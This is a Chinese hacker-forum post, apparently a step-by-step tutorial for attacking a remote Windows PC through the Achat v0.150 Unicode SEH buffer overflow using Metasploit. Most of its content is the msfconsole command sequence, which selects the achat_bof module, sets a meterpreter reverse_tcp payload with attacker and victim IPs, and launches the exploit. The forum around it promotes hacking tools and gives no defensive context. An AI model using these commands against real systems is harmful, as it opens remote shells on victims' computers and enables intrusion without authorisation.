使用Achat Unicode SEH缓冲区溢出攻击远程Windows PC

weiweihack
8970weiweihack首席执行运营官
2018-11-14 22:28:53
8970 2018-11-14 22:28:53
黑客话题: 缓冲区溢出攻击
该模块利用Achat中的Unicode SEH缓冲区溢出。通过将制作的消息发送到默认端口9256 / UDP,可以覆盖SEH处理程序。即使利用是可靠的,它也取决于时间,因为在同一时间内有两个线程溢出堆栈。此模块已在Windows XP SP3和Windows 7上运行的Achat v0.150上进行了测试。


利用目标

Achat v0.150


需求

攻击者:kali Linux
受害者PC:Windows XP SP 3
打开Kali终端类型  msfconsole

描述:使用Achat Unicode SEH Buffer Overflow攻击远程Windows PC

图片:1.png

使用Achat Unicode SEH Buffer Overflow攻击远程Windows PC

现在输入  exploit use / windows / misc / achat_bof
msf exploit(achat_bof)> set payload windows / meterpreter / reverse_tcp
msf exploit(achat_bof)> set lhost 192.168.1.7  (本地主机的IP)
msf exploit(achat_bof)> set rhost 192.168.1.8  (远程主机的IP)
msf exploit(achat_bof)> exploit

描述:使用Achat Unicode SEH Buffer Overflow攻击远程Windows PC

图片:3.png

使用Achat Unicode SEH Buffer Overflow攻击远程Windows PC

描述:使用Achat Unicode SEH Buffer Overflow攻击远程Windows PC

图片:2.png

使用Achat Unicode SEH Buffer Overflow攻击远程Windows PC

本文标题:使用Achat Unicode SEH缓冲区溢出攻击远程Windows PC
本文作者:weiweihack
本文来自:蚁安黑客官网
转载请注明本文链接:http://bbs.mayidui.net/t2408.html
游客
登录黑客论坛后才可以回帖,黑客登录 或者 注册黑客
weixin
蚁安黑客

找黑客工具、找黑客教程、找黑客朋友,你想不到的黑客技术这儿都有!

微信号:baiyiwangan